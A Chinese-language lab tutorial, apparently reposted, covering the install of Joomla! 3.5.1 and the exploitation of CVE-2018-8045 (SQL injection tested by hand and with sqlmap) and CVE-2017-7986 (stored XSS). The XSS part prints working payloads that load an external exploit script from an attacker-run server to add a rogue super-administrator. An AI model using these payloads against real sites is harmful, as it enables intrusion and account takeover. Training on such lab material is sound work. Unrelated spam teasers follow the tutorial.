分享好友 最新动态首页 最新动态分类 切换频道
36_Joomla! 3.5.1安装部署、CVE-2018-8045漏洞利用、CVE-2017-7986漏洞利用、CVE-2017-7986_EXP.js
2024-12-26 13:09

它使用户能够构建自定义网站和强大的在线应用程序

Joomla!中文网 : 首页 - ZMAX程序人

蓝奏云
https://wwtt.lanzn.com/b00uyckd9a
密码:2x71

步骤一:复制Joomla!3.5.1目录到网站根目录

将Joomla! 3.5.1压缩包解压后复制到网站根目录,并重命名为Joomla。

步骤二:网站安装向导的配置

1)使用浏览器访问Joomla网站

进入到安装向导的主要配置界面,如图-25所示。

分别填写网站名称(如:XX学习网站)、管理员的邮箱(如:admin@tedu.cn)、管理员的用户名(如:admin)、管理员的密码(如:123456)。

点击“下一步”。

2)数据库设置

点击“下一步”之后,进入数据库设置的界面,如图-26所示。

分别填写用户名(如:root)、数据库密码(如:root,其他保持默认即可。

点击“下一步”。

图-26

3)概况-最终确认

点击“下一步”之后,进入到概况界面如图-27、图-28所示,选择“博客风格的示范内容(英文)”,其他内容浏览再次确认,确认无误,之后点击“安装”。

点击“删除目录installation”,可进入“网站”或者“后台管理”,如图-29所示。  如果不删除假如黑客爆破到了这个目录一进来不就可以重新安装覆盖了嘛

问个问题,为啥数据库表要加前缀,因为加了前缀后名字就复杂了,相当于密码变复杂了,防止爆破,因为后面的表名都是有意义的,加上前面无意义的前缀,就不好猜了

步骤三:登录后台,对Joomla!进行汉化

1)在URL地址栏输入http://域名(IP)/administrator 登陆后台,并输入用户名和密码,点击“Log in”进行登录,如图-30所示。

2)对Joomla进行汉化

点击“Extensions”-“Language(s)”,如图-31所示,进入到语言设置界面。

点击“Install Languages”,如图-32所示,进入语言包的下载界面。

选择“Chinese Simplified”,如图-33所示,之后点击左上角“Install”进行安装,如图-34所示。

将汉化包设置为默认语言,网站前台及网站后台都将汉化包设置为默认语言,如图-35所示。因为是去国外网站比较慢,如果失败多试几次或者上mf

步骤四:使用AWVS对Joomla!进行漏洞扫描

具体创建目标网站、扫描步骤可参照AWVS的使用,扫描结果如图-36所示。

步骤一:对CVE-2018-8045进行漏洞验证

        正常来讲可以先简单测试一下,猜测一下整个后台哪些功能跟数据库有关系,跟数据库有数据的交互,那么这个功能呢就有可能存在SQL注入。关于注入点先找带有提交参数的功能

1)点击“会员管理”-“会员注释管理”,如图-37所示,进入到会员注释管理界面,之后点击“按属性筛选”,如图-38所示。

2)配置Firefox代理功能。

Http Proxy:127.0.0.1

Port:8080

3)启动BurpSuite代理抓包,保证“Intercept is on”。

4)访问漏洞页面,抓取Post数据

在Joomla!后台点击“Uncategorised”。

在BurpSuite抓取数据,如图-42所示。

5)将filter[category_id]的值由7改成单引号’,如图-43所示,进行SQL注入漏洞的验证。

6)返回到Joomla!页面发现出现了报错,如图-44所示,则验证了SQL注入漏洞的存在。

        还可以换另一种思路,正常网站可能你是想不到哪儿就有注入点的

        也可以先通过前端看到,第一个value和第一个的值不同。通过猜测,是不是可能放在where里面去筛选,通过where去查询不同的值然后会显示不同的内容,那就是说,刚刚看到的参数值就可能拼接到SQL语句里边,所以咱们测试点就在这里。

抓到的两个包放出来对比一下,[category_id]的值不同

filter[search]=

&list[fullordering]=a.review_time DESC

&list[limit]=20

&filter[published]=1

&filter[category_id]=7

&task=

&boxchecked=0

&2e231a48c25ae0f378ef9102e2345b4c=1

filter[search]=

&list[fullordering]=a.review_time DESC

&list[limit]=20

&filter[published]=1

&filter[category_id]=

&task=

&boxchecked=0

&2e231a48c25ae0f378ef9102e2345b4c=1

         或者简单点效率点的,也可以通过前端看到,第一个value和第一个的值不同。通过猜测,是不是可能放在where里面去筛选,通过where去查询不同的值然后会显示不同的内容,那就是说,刚刚看到的参数值就可能拼接到SQL语句里边,所以咱们测试点就在这里。可以发到重放模块去测

        先试试7-1,但看不太懂怎么办,其实burp的新版在右边有浏览器多个按钮可以打开,这个版本比较老就没有

        试一下看加引号,是不是引号生效了,还记得什么算是SQL注入,是不是拼接的内容以SQL语句的形式去执行就意味着SQL注入,既然加了引号报错了生效了那就是当成SQL语句执行了,所以这里是有漏洞的

        试一下7' and 1=2 -- -,判断双引还是单引,7' and 1=2 -- -,手动测试就得慢慢测了,但我们可以丢sqlmap工具呀,数据是post请求体里面,就得用到sqlmap的针对post的注入方式,接下来打开sqlmap。

步骤二:对CVE-2018-8045进行漏洞攻击

1)右击界面,点击“Copy to file”将抓取的数据复制到文件,命名为payload.txt,如图-45所示。

2)基于sqlmap进行SQL注入攻击

使用sqlmap -r功能读取POST注入,-p 对参数filter[category_id]进行sql注入漏洞验证,可继续渗透获取相关数据的表、列、字段等信息。

┌──(root💀kali)-[~]
└─# sqlmap  -r  payload.txt  -p  filter[category_id]   --batch

[INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12

注意下路径,跑起来后还是挺慢的也是一个个去测

        当然,可以用类似的方式看别的地方是不是也有类似的SQL注入,想快可以先前端检查一下,不同下拉框对应不同的值

加了引号或者' and 1=2 -- -,但是这儿没有报错,但是没报错不一定没有,是吧,如果你不想一个一个对的去测,可以交给sqlmap直接去跑这个参数不就行了嘛,但是这儿没有报错大概率就没有SQL注入的点。

        总之大家在挖漏洞的时候其实就是抓包然后去测,测每一个参数,比如加引号,盲注,之类的看那个包有什么反应有什么不同点

步骤一:在Joomla!中添加注册菜单项,开启用户的自注册功能

1)点击“菜单管理”-“Main Menu”-“添加菜单项”,如图-46所示。

2)填写菜单项名称(如:注册会员,选择“注册表单”的菜单项类型,如图-47所示。

3)点击“系统管理”-“全局配置”-“会员管理”,打开会员管理相关配置界面,如图-48、图-49所示。

  • 允许会员注册:是
  • 新会员默认会员组:Author
  • 发送密码:否
  • 新会员账号激活方法:无
  • 给管理员发通知邮件:否
  • 验证码:不使用
  • 网站前台语言:显示
步骤二:注册测试Joomla!会员

1)访问网站前台页面http://域名(IP),进入网站前台页面,点击“注册会员”,填写注册信息(用户名:tarena,密码:123456,进行注册,如图-50所示。

2)点击“Author Login”,输入用户名密码,登录测试用户tarena,如图-51所示。

3)图-52为登录过后的页面。

步骤三:发布文章验证CVE-2017-7986漏洞的存在

1)点击“Change Password”,将编辑器选择为“CodeMirror代码编辑器”,如图-53所示,可绕过客户端验证,之后点击“提交”。

看到这里,h1好像生效了,但是下面的弹窗<script>标签没了,应该是被过滤了,做了简单的过滤,那么可以百度一下有哪些是可以被利用,都复制进去看一下哪些会被过滤,没被过滤的才有被利用的可能

点击按钮这里的onclick没了

总之思路就是这么个思路,就是不断测试

 2)点击“Create a Post”新建一篇文章测试XSS漏洞,文章内容如图-54所示。

 
 

那么formaction函数是啥,可以去查一下,毕竟知识点有限的话可能只想到一些去测,如果想对XSS非常精通的话,就得把前端的html、js学熟,CSS可以放着不管

3)点击“内容管理”-“文章管理”,点击“激活按钮”进行文章激活,如图-55所示。

4)返回前台首页,点击文章的“点我”按钮出现弹窗“1”,如图-56所示,由此判断存在XSS漏洞。

<form><button formaction="javascript&colon;alert(1)">点我</button></form>
这样的语句不熟不要紧,可以多积累这样的,以后测试XSS漏洞时总会用得上

步骤四:发布文章对CVE-2017-7986进行漏洞利用
下载地址
https://wwtt.lanzn.com/b00uycq71c
密码:ebp3

1)搭建恶意网站,将“CVE-2017-7986_EXP.js”脚本放入kali网站服务的网站根目录(访问地址:http://192.168.67.5/ CVE-2017-7986_EXP.js,使XSS漏洞客访问js脚本,如图-57所示。

┌──(root㉿kali)-[~/桌面] └─# cp CVE-2017-7986_EXP.js /var/www/html

        说白了这就是个JS文件,里面就是一串JS代码,可以打开看看,有很多,里面写的都啥意思呢,待会做完效果后才好理解点。

        直接写到文章中也可以,但是太长太长了,所以咱们把它放到一个JS文件中,使用那种外链的方式链接进来让他执行,所以要用外链是不是得搭建一个可以访问到JS文件的网站啊,俗称恶意网站

这是把它放到网站根目录里边

注意要添加权限

┌──(root💀localhost)-[/var/www/html] └─# chmod +r CVE-2017-7986_EXP.js

如果是kali,注意开启web服务

┌──(root💀localhost)-[~/桌面] └─# systemctl restart apache2

结果我这儿跟OpenVAS的服务有冲突,不关掉它,那就换一个方法,直接丢在本机的皮皮面板里好了

总之通过浏览器能访问就行

  1. 新发布文章,文章内容为XSS攻击代码,如图-58所示。

注意:代码中的url是js脚本的访问地址,要根据自己的脚本地址进行填写。

 

简单来讲,分行后会好看一些,就是加载了一个script标签,通过外链的方式 

<form><button formaction="javascript&colon;
(function(){
var url='http://192.168.10.1/CVE-2017-7986_EXP.js';
var bf = document.createElement('script');
bf.type='text/javascript';
bf.src=url;
document.body.appendChild(bf);
})();">点我</button></form>


<script type="text/javascript" src="http://192.168.10.1/CVE-2017-7986_EXP.js"></script>

        这个漏洞其实结合了两部分,一个是XSS,第二个通过JS代码构造了伪造的请求,利用了csrf漏洞,一起的结合

3)管理员后台预览文章,进入该文章,点击“版本管理”,如图-59所示。

4)勾选当前的版本,点击“预览”,进行文章预览,如图-60所示。

5)点击“点我”按钮,触发XSS攻击代码,如图-61所示。

6)进入会员列表,会发现对了一个超级用户“Tedu”,密码是“123456”,如图-62所示,XSS漏洞攻击代码被触发。

最新文章
58同城励志广告:致追梦路上勇敢前行的你!
关注回复“营销”免费领取2G《营销策略及管理制度大全》 编辑老罗 | 品牌营销报(ID:PPYX007)来源叶川 | 营销观察报(yingxiaogcb)2018,我的故事从勇敢追梦开始!春节过完,家的味道随着每个人的离开渐渐变淡。在家吃的每顿菜饭都酱香
ai怎么设计路牌灯箱平面插画效果?
路牌被用来展示大型的广告,谁想要使用ai进行画面的效果模拟,从而让设计出来的广告画更加的符合路牌的尺寸与环境。该怎么设计路牌灯箱呢?请看下文详细介绍。1、先用圆角矩形工具画出一个立柱,我们用灰黑色的渐变填充。2、继续用圆角矩形
AI绘画神器:一键生成超逼真美女写真,你准备好了吗?
限时免费,点击体验最近超火的AI生图神器,坐拥3000美女的大男主就是你! https://ai.sohu.com/pc/generate/textToImg?_trans_=030001_yljdaimn 在这个数字时代,AI技术已经无处不在,甚至连我们平常所见的美女写真也可以通过AI工具轻松生
20分钟带你了解:楚雄怎么找附近的人上门
楚雄怎么找附近的人上门==(惘:s m 1 8 . c c 址==啃啄RTYFDGBGD哼啇==加拿大继续接纳数以万计的新永久居民,努力实现2024年接纳48.5万名新移民的目标。最新数据显示,截至5月份,该国今年已迎来210,865名新永久居民。加拿大继续接纳数以
Acne Studios入口内几乎都有6折+用码85折,半价拿下应季秋冬款
※ Mr Porter支持VISA、MASTERCARD双币/多币信用卡,也支持paypal、银联付款; ※ Mr Porter支持直邮全球,通过切换网站顶部的国家可以进入不同国家的站点,查看到直邮这个国家的所有商品,由于各个国家贸易政策不相同,Mr Porter有的产品
7723游戏盒子下载免root安卓最新版v5.5.2安卓版
7723游戏盒子免root安卓最新版为广大游戏玩家提供的安全实用便捷的游戏辅助,还在为找不到破解的游戏而烦恼么,7723有各种破解游戏等待着你,还在为氪金而纠结苦恼么,7723有更多福利礼包免费送,还在为找不到心仪的游戏二烦心么,7723为你
5G、人工智能到底多重要?大咖们这么说
  央视网消息:11月7日,第五届世界互联网大会在浙江乌镇正式开幕。有关5G技术、人工智能、个人信息安全、互联网新趋势的讨论,在乌镇各个角落展开。  5G技术  腾讯马化腾:5G太快了,应该考虑开发VR版微信了  这5年,世界互联网大
AI赋能体育:生成内容的无限可能191
随着人工智能(AI)技术的发展,其在体育领域的应用越来越广泛。其中,AI生成内容(AIGC)尤其引人注目,它能够基于算法和大量数据,自动生成逼真且内容丰富的文本、图像、音频和视频等内容。在体育领域,AI生成内容具有以下优势:提升内容
2022多人联机解密手游推荐前十名 好玩的联机解密游戏排行榜
解密游戏当中,包含有引人入胜的故事剧情,以及刺激的游戏画面,很多玩家都十分喜欢,今天小编为大家带来了2022多人解密推荐前十名。在今天小编带来的文章当中,小编将为大家介绍几款比较有趣的解密。匠木是一款手游,游戏当中包含了浓浓的
36氪
价值评估:36氪于2024-12-19发布于本站,并永久保存在16757网址导航收录中,36氪主要是介绍36氪通过全面,独家的视角为用户深度剖析最前沿的资讯,致力于让一部分人先看到未来,内容涵盖快讯,科技,金融,投资,房产,汽车,互联网,股市
相关文章
推荐文章
发表评论
0评